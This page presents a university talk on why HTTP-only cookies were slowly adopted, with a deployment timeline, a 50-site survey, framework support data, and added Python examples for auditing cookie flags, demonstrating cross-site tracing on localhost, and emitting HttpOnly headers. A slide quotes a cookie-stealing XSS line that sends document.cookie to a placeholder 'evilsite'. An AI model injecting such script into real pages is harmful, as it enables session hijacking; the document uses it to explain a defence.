Challenges in Widely Deploying HTTP-only Cookies
HTTP-only cookies have a clear security benefit: a script injected through a cross-site scripting bug cannot read them through document.cookie, so the attacker is not handed the session cookie outright. Even so, deployment has been slow. Sites worry that page functionality depends on script access to cookies, major sites and server-side frameworks were late to support the flag, and the client side had holes (cross-site tracing, XMLHttpRequest access to response headers) that let a script recover an HTTP-only cookie anyway. The deployment timeline, the survey of 50 popular sites, and the framework support table below show where adoption stood at the time of the talk.
Presentation Transcript
Why aren't HTTP-only cookies more widely deployed? Yuchen Zhou and David Evans, Department of Computer Science, University of Virginia
HTTP-only Cookies
The HttpOnly attribute of a Set-Cookie header prevents the cookie from being read via document.cookie. Without it, the cookie is visible to any script running in the page.

    Set-Cookie: name=value; Domain=value; Expires=value; Path=value; Secure
    Set-Cookie: name=value; Domain=value; Expires=value; Path=value; Secure; HttpOnly

(diagram: an attacker injects evil JS into the page; the script can modify the DOM, disclose the user's confidential data, install a trojan, or read the user's credentials from document.cookie and send them back to the attacker. The slide sketches the last case as an injected image request that carries the cookie in its URL:)

    <script>new Image().src = "http://evilsite/stealyourcookie.cgi?value=" + document.cookie;</script>
HTTP-only Deployment Timeline (2002 to 2010)
Client/browser events:
- 2002: IE6 introduces HTTP-only.
- US-CERT publishes a vulnerability note on XST (cross-site tracing) attacks.
- A Firefox extension adds HTTP-only support; 2007: Firefox 2.0.0.5 supports HTTP-only natively.
- w3.org's XMLHttpRequest specification says browsers should disallow TRACE requests; the TRACE method is subsequently disabled by all major browsers.
- 2009: IE8 fixes the XMLHttpRequest response-header exploit (script reading HTTP-only cookies out of Set-Cookie response headers).
- An IETF standard draft includes HTTP-only.
- 2010: Apache.org is compromised by cookie-stealing XSS attacks.
Server-side events:
- Django developers consider supporting HTTP-only, but compatibility concerns hold them back.
- 2008: Python 2.6 adds HTTP-only support to its cookie module; an unofficial Django patch becomes available.
- 2008: Ruby on Rails supports HTTP-only; 2009: Ruby on Rails sets HTTP-only on by default.
- Still no official Django support for HTTP-only.
- The TRACE method is still on by default on Apache servers and on major websites [10].
- Lots of major sites still don't use HTTP-only cookies.
Methodology
50 sites were taken from the Alexa.com world top 100. For each site the authors manually registered an account and collected the properties of the cookies set before and after login, checking whether the authentication cookie carried HttpOnly.
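The classification step of that survey, automated over captured response headers, as an added example (this is not the authors' tooling). It parses each Set-Cookie header the way a browser does (attribute names case-insensitive, HttpOnly and Secure as bare flags) and reports which authentication-looking cookies are readable from document.cookie. The sample headers, the cookie names and the name heuristic used to pick out authentication cookies are constructed for the example.

```python
"""Audit Set-Cookie headers for the HttpOnly and Secure flags.

Added example for this page (not the authors' survey tooling).  The sample
headers below are constructed, not captured from any real site.
"""
from __future__ import annotations

# Attributes that take no value.  Matching is case-insensitive, as browsers do it.
FLAG_ATTRIBUTES = {"httponly", "secure"}

# Heuristic (an assumption of this example, not a standard): cookie names that
# usually carry the login session.
AUTH_NAME_HINTS = ("sess", "auth", "login", "sid")


def parse_set_cookie(header: str) -> dict:
    """Parse one Set-Cookie header value into name, value and attributes.

    Returns {"name": ..., "value": ..., "attrs": {lowercase-attr: value-or-True}}.
    Unknown attributes are kept so the caller can inspect them.
    """
    parts = [p.strip() for p in header.split(";")]
    if not parts or "=" not in parts[0]:
        raise ValueError(f"malformed Set-Cookie: {header!r}")
    name, _, value = parts[0].partition("=")
    attrs: dict = {}
    for part in parts[1:]:
        if not part:
            continue
        key, eq, val = part.partition("=")
        key = key.strip().lower()
        if key in FLAG_ATTRIBUTES:
            attrs[key] = True          # a flag attribute is set by presence alone
        elif eq:
            attrs[key] = val.strip()   # e.g. expires=..., path=..., domain=...
        else:
            attrs[key] = True          # tolerate unknown valueless attributes
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def looks_like_auth_cookie(name: str) -> bool:
    lowered = name.lower()
    return any(hint in lowered for hint in AUTH_NAME_HINTS)


def audit(set_cookie_headers: list[str]) -> dict:
    """Classify every cookie in a response, keyed by cookie name."""
    report = {}
    for header in set_cookie_headers:
        cookie = parse_set_cookie(header)
        httponly = bool(cookie["attrs"].get("httponly"))
        secure = bool(cookie["attrs"].get("secure"))
        auth_like = looks_like_auth_cookie(cookie["name"])
        report[cookie["name"]] = {
            "httponly": httponly,
            "secure": secure,
            "auth_like": auth_like,
            # The survey's criterion: an authentication cookie without HttpOnly
            # is readable by injected script.
            "exposed_to_script": auth_like and not httponly,
        }
    return report


def exposed_cookies(set_cookie_headers: list[str]) -> list[str]:
    """Names of authentication-looking cookies that lack HttpOnly."""
    return [n for n, r in audit(set_cookie_headers).items() if r["exposed_to_script"]]


# Constructed sample: what a post-login response from a site might set.
SAMPLE_POST_LOGIN_HEADERS = [
    "sessionid=4f2d9c1e; Path=/; HttpOnly",
    "csrftoken=Qx8L; Path=/; expires=Wed, 21 Oct 2015 07:28:00 GMT",
    "auth_token=ab12cd34; Domain=.example.test; Path=/; Secure",
    "theme=dark; Path=/",
    "remember_sid=9a9a9a; Path=/; Secure; httponly",
]

if __name__ == "__main__":
    for name, result in audit(SAMPLE_POST_LOGIN_HEADERS).items():
        print(f"{name:14} HttpOnly={result['httponly']!s:5} "
              f"Secure={result['secure']!s:5} exposed={result['exposed_to_script']}")
    print("exposed authentication cookies:", exposed_cookies(SAMPLE_POST_LOGIN_HEADERS))
```

In the sample only auth_token is reported as exposed: it is Secure, which protects it on the wire, but without HttpOnly it is still readable by script. Note that the csrftoken cookie is deliberately left readable, since a CSRF token is often meant to be picked up by the page's own JavaScript; that is why the audit keys on authentication-looking names rather than flagging every cookie.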
Survey Results (50 sites)
- 24 sites use HTTP-only authentication cookies: 11 set them before login, 13 after login.
- 26 sites have no HTTP-only authentication cookies.
Kapil Singh et al. (IEEE Security and Privacy, Oakland 2010) reported similar deployment figures: HTTP-only in use on 30 of the top 100 sites, and on 16.2% of a 100,000-site sample.
Survey Results on Web Frameworks
Framework        Version   Date        HTTP-only support   HTTP-only default
(name missing)   1.1.1     July 2009   No                  -
Authkit          0.4.4     July 2009   No                  -
Repoze.who       1.0.10    2009        No                  -
(name missing)   2.3.2     Mar 2009    Yes                 Yes
(name missing)   2.2.2     Nov 2008    Yes                 No
(name missing)   2.1.2     Oct 2008    No                  -
(name missing)   4.0       Feb 2010    Yes                 Yes
(name missing)   1.4       Feb 2010    Yes                 No
(name missing)   3.0       Feb 2010    No                  No
Why Aren't HTTP-only Cookies More Widely Deployed?
Page Functionality
Does the DOM need to read cookies? Marking the cookies HttpOnly broke almost nothing: only 1 site out of 50 showed a minor malfunction, in its web IM gadget (renren.com).
Can We Circumvent HTTP-only?
(diagram: the injected evil JS can no longer read the cookie through document.cookie; the question is whether it can obtain the cookie value some other way, store it in a variable, and send it back to the attacker)
Can We Circumvent HTTP-only?
(two bar charts over the 50 surveyed sites: "Cross-site tracing", counting sites with TRACE enabled versus disabled, and "AJAX based attack", counting sites insecure versus secure against reading the cookie out of XMLHttpRequest response headers; the y axis is the number of sites, 0 to 30)
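The cross-site tracing half of that chart, reduced to a runnable check, as an added example (not the authors' code). TRACE makes the server echo the request it received, headers included, so a script that can issue a TRACE to the site gets the Cookie header back in the response body, HttpOnly or not. Two minimal servers run on the loopback interface: one that implements TRACE as an echo, and one that refuses it; a client sends the request a browser would, with the session cookie attached. The cookie value and the handler names are constructed for the example.

```python
"""Cross-site tracing (XST) against an HttpOnly cookie, and the server-side fix.

Added example for this page, not the authors' code.  Runs entirely on
127.0.0.1 with ephemeral ports; the cookie value is constructed.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed session cookie.  The server would have set it with HttpOnly, so
# document.cookie never shows it to script; the only way for script to see it
# is to get the server to repeat it.
SESSION_COOKIE = "sessionid=4f2d9c1e-secret"


class EchoingTraceHandler(BaseHTTPRequestHandler):
    """Server with TRACE enabled: echoes the request line and headers."""

    def do_TRACE(self):
        body = (self.requestline + "\r\n" + str(self.headers)).encode("iso-8859-1")
        self.send_response(200)
        self.send_header("Content-Type", "message/http")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)            # the Cookie header comes back verbatim

    def log_message(self, *args):         # keep the demo output quiet
        pass


class HardenedHandler(EchoingTraceHandler):
    """Same server with TRACE disabled: nothing is echoed, so nothing leaks."""

    def do_TRACE(self):
        self.send_error(405, "TRACE is disabled")


def start_server(handler_cls) -> HTTPServer:
    """Bind to an ephemeral loopback port and serve in a background thread."""
    server = HTTPServer(("127.0.0.1", 0), handler_cls)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def probe_trace(port: int, cookie: str = SESSION_COOKIE) -> dict:
    """Send TRACE with the cookie attached, as a browser would for any request.

    Returns the status and whether the cookie came back in the body, i.e.
    whether a script issuing this request would now hold the HttpOnly cookie.
    """
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    try:
        conn.request("TRACE", "/", headers={"Cookie": cookie})
        resp = conn.getresponse()
        body = resp.read().decode("iso-8859-1", errors="replace")
    finally:
        conn.close()
    return {"status": resp.status, "cookie_leaked": cookie in body, "body": body}


def run_demo(handler_cls) -> dict:
    """Start a server with the given handler, probe it once, and shut it down."""
    server = start_server(handler_cls)
    try:
        return probe_trace(server.server_address[1])
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    leaky = run_demo(EchoingTraceHandler)
    print("TRACE enabled :", leaky["status"], "cookie leaked:", leaky["cookie_leaked"])
    print(leaky["body"])
    fixed = run_demo(HardenedHandler)
    print("TRACE disabled:", fixed["status"], "cookie leaked:", fixed["cookie_leaked"])
```

The client half of XST is what the browser side of the timeline closed: current browsers refuse to send TRACE from XMLHttpRequest or fetch, so the attack no longer works from a page. The server half is still worth checking, which is the slide's point that TRACE stayed on by default; on Apache httpd the switch is `TraceEnable off`, and the probe above (pointed at a real host and port rather than the demo server) tells you whether a server still echoes.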
Protection Effectiveness
(diagram: HttpOnly stops the injected script from reading the cookie's value, nothing more. The script can still make requests on the user's behalf that carry the cookie automatically (CSRF), and attacks that reach the user's hard drive, such as installing a trojan, are untouched.)
Software Stack Compatibility
Django developers: "Hmm, we probably can't use a patch that requires a patched python. Any different solution?"
Python's standard cookie module did not support HttpOnly until Python 2.6. Django is built on Python and had to keep running on older interpreters, so its own HttpOnly support stalled behind the interpreter's.
Standards Compliance
Django developers: "Also, could you point me to where the RFC is talking about 'httponly'? I couldn't find it at all."
The cookie specification had never been updated since HttpOnly was introduced (the attribute appeared in IE6, not in an RFC). Without a spec to point to, the developers hesitated to make the change.
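What the server side has to emit, and what the compatibility complaint was about, as an added example (not Django's code). Python's standard module (http.cookies in Python 3, the Cookie module that gained HttpOnly in 2.6) writes the attribute from a table of reserved names; an interpreter whose table lacks the entry silently drops it, which is what an unofficial patch had to work around. The registration helper below reproduces that kind of workaround and is a no-op on current Python; the secure-by-default signature and the cookie names are this example's choices.

```python
"""Emit Set-Cookie headers with HttpOnly from Python's standard cookie module.

Added example for this page, not Django's code.  The registration step is the
style of workaround an unofficial patch needs when Morsel does not know the
attribute; on any current Python it does nothing.  Cookie names and values
are constructed.
"""
from http.cookies import Morsel, SimpleCookie
from typing import Optional


def ensure_httponly_supported() -> bool:
    """Register HttpOnly on Morsel if the stdlib predates it (assumed workaround).

    Returns True when registration was needed.  Python 2.6 and every 3.x already
    list "httponly" in Morsel._reserved, so this normally returns False.
    """
    if "httponly" in Morsel._reserved:
        return False
    Morsel._reserved["httponly"] = "HttpOnly"   # spelling that goes on the wire
    if hasattr(Morsel, "_flags"):               # valueless attributes (Python 3)
        Morsel._flags.add("httponly")
    return True


def set_cookie_header(name: str, value: str, *, path: str = "/",
                      secure: bool = True, httponly: bool = True,
                      max_age: Optional[int] = None) -> str:
    """Build one Set-Cookie line.  HttpOnly and Secure are on unless opted out."""
    ensure_httponly_supported()
    jar = SimpleCookie()
    jar[name] = value                 # SimpleCookie quotes the value if needed
    morsel = jar[name]
    morsel["path"] = path
    if max_age is not None:
        morsel["max-age"] = max_age
    morsel["secure"] = secure         # flag attributes: emitted only when truthy
    morsel["httponly"] = httponly
    return morsel.output(header="Set-Cookie:")


def is_httponly(header_line: str) -> bool:
    """Check a Set-Cookie line the way a browser does: bare, case-insensitive token."""
    return any(part.strip().lower() == "httponly" for part in header_line.split(";"))


if __name__ == "__main__":
    for line in (
        set_cookie_header("sessionid", "4f2d9c1e", max_age=3600),
        set_cookie_header("theme", "dark", secure=False, httponly=False),
    ):
        print(line, "->", "HttpOnly" if is_httponly(line) else "readable by script")
```

Morsel writes attributes in alphabetical order, so the session line comes out as `Set-Cookie: sessionid=4f2d9c1e; HttpOnly; Max-Age=3600; Path=/; Secure`. Making the flags opt-out in the helper's signature is the "be aggressive" lesson from the end of the talk applied on the server: a cookie that script legitimately needs has to say so.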
Difficulty in Deploying at Both Ends
(the deployment timeline from above is shown again: browser support arrived piece by piece on the client side while framework support lagged on the server side)
Server side: add the HttpOnly field to cookies.
Client side: interpret the HttpOnly field correctly, and implement the HttpOnly defense correctly, which means disabling TRACE and keeping Set-Cookie headers out of reach of script as well as blocking document.cookie.
Similar deployment problems: the Set-Cookie2 header of RFC 2965, and updating the TCP protocol.
Lessons Learned
- Maintain backward compatibility: a new attribute (HttpOnly, or an HttpOnly=true form) must be something that clients which do not understand it ignore without breaking.
- Be aggressive on the client side: add HttpOnly by default. Opt-in? Opt-out!
Thank you! Questions?
Page Functionality (backup slide)
Google Analytics? Its tracking cookies are set and read by the Google Analytics JavaScript itself, so they are separate from the authentication cookie; marking the authentication cookie HttpOnly does not affect them.